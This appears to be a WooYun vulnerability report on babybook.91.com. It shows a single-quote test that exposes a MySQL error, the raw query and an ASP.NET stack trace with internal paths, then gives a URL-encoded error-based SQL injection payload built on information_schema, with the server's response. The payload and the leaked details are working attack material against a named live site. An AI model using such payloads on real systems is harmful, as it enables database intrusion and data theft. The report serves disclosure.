WooYun.org

正常页面：
http://babybook.91.com/Book/BookDetail.aspx?id=83JUNDGO9EQMUXTN

http://babybook.91.com/Book/BookDetail.aspx?id=83JUNDGO9EQMUXTN’
“/”应用程序中的服务器错误。
SELECT * FROM `BIZ_BOOK` WHERE `BOOK_ID` = '83JUNDGO9EQMUXTN''    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''83JUNDGO9EQMUXTN''' at line 1
说明: 执行当前 Web 请求期间，出现未处理的异常。请检查堆栈跟踪信息，以了解有关该错误以及代码中导致错误的出处的详细信息。 
异常详细信息: System.Exception: SELECT * FROM `BIZ_BOOK` WHERE `BOOK_ID` = '83JUNDGO9EQMUXTN''    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''83JUNDGO9EQMUXTN''' at line 1
源错误: 
执行当前 Web 请求期间生成了未处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。
堆栈跟踪: 
[Exception: SELECT * FROM `BIZ_BOOK` WHERE `BOOK_ID` = '83JUNDGO9EQMUXTN''    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''83JUNDGO9EQMUXTN''' at line 1]
   Yaohuasoft.Framework.Library2.YaohuaDatabase.SelectTable(String sql, DbParameter[] Parameter) +281
   Yaohuasoft.Framework.Library2.YaohuaDatabase.SelectTable(String sql) +7
   Yaohuasoft.UAP.DAL2.BizBookDAL.SelectTableImpl(Where where, OrderBy orderBy, String tableName) +493
   Yaohuasoft.UAP.DAL2.BizBookDAL.SelectImpl(Where where, OrderBy orderBy, Int32 SplitId) +89
   Yaohuasoft.UAP.DAL2.BizBookDAL.SelectImpl(String id, Int32 SplitId) +165
   Yaohuasoft.UAP.DAL2.BizBookDAL.Select(Int32 DbIndex, String id, Int32 SplitId) +263
   Yaohuasoft.UAP.DAL2.BizBookDAL.Select(Int32 DbIndex, String id) +45
   ND.BabyBook.FrontService.BookService.GetEntity(String id) in E:\项目文件\幼儿教育\内网正常的babybook(最新版)\ND.BabyBook\ND.BabyBook.Service\FrontService\BookService.cs:558
   ND.BabyBook.Web.Book.BookDetail.Bind(String id) in E:\项目文件\幼儿教育\内网正常的babybook(最新版)\ND.BabyBook\ND.BabyBook.Web\Book\BookDetail.aspx.cs:60
   ND.BabyBook.Web.Book.BookDetail.Page_Load(Object sender, EventArgs e) in E:\项目文件\幼儿教育\内网正常的babybook(最新版)\ND.BabyBook\ND.BabyBook.Web\Book\BookDetail.aspx.cs:43
   System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
   System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
   System.Web.UI.Control.OnLoad(EventArgs e) +99
   System.Web.UI.Control.LoadRecursive() +50
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
版本信息: Microsoft .NET Framework 版本:2.0.50727.3634; ASP.NET 版本:2.0.50727.3618

http://babybook.91.com/Book/BookDetail.aspx?id=83JUNDGO9EQMUXTN%27%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%String_Col%%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%20%271%27=%271
“/”应用程序中的服务器错误。
SELECT * FROM `BIZ_BOOK` WHERE `BOOK_ID` = '83JUNDGO9EQMUXTN' and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1'    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x fro' at line 1
说明: 执行当前 Web 请求期间，出现未处理的异常。请检查堆栈跟踪信息，以了解有关该错误以及代码中导致错误的出处的详细信息。 
异常详细信息: System.Exception: SELECT * FROM `BIZ_BOOK` WHERE `BOOK_ID` = '83JUNDGO9EQMUXTN' and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1'    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x fro' at line 1
源错误: 
执行当前 Web 请求期间生成了未处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。
堆栈跟踪: 
[Exception: SELECT * FROM `BIZ_BOOK` WHERE `BOOK_ID` = '83JUNDGO9EQMUXTN' and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1'    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x fro' at line 1]
   Yaohuasoft.Framework.Library2.YaohuaDatabase.SelectTable(String sql, DbParameter[] Parameter) +281
   Yaohuasoft.Framework.Library2.YaohuaDatabase.SelectTable(String sql) +7
   Yaohuasoft.UAP.DAL2.BizBookDAL.SelectTableImpl(Where where, OrderBy orderBy, String tableName) +493
   Yaohuasoft.UAP.DAL2.BizBookDAL.SelectImpl(Where where, OrderBy orderBy, Int32 SplitId) +89
   Yaohuasoft.UAP.DAL2.BizBookDAL.SelectImpl(String id, Int32 SplitId) +165
   Yaohuasoft.UAP.DAL2.BizBookDAL.Select(Int32 DbIndex, String id, Int32 SplitId) +263
   Yaohuasoft.UAP.DAL2.BizBookDAL.Select(Int32 DbIndex, String id) +45
   ND.BabyBook.FrontService.BookService.GetEntity(String id) in E:\项目文件\幼儿教育\内网正常的babybook(最新版)\ND.BabyBook\ND.BabyBook.Service\FrontService\BookService.cs:558
   ND.BabyBook.Web.Book.BookDetail.Bind(String id) in E:\项目文件\幼儿教育\内网正常的babybook(最新版)\ND.BabyBook\ND.BabyBook.Web\Book\BookDetail.aspx.cs:60
   ND.BabyBook.Web.Book.BookDetail.Page_Load(Object sender, EventArgs e) in E:\项目文件\幼儿教育\内网正常的babybook(最新版)\ND.BabyBook\ND.BabyBook.Web\Book\BookDetail.aspx.cs:43
   System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
   System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
   System.Web.UI.Control.OnLoad(EventArgs e) +99
   System.Web.UI.Control.LoadRecursive() +50
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627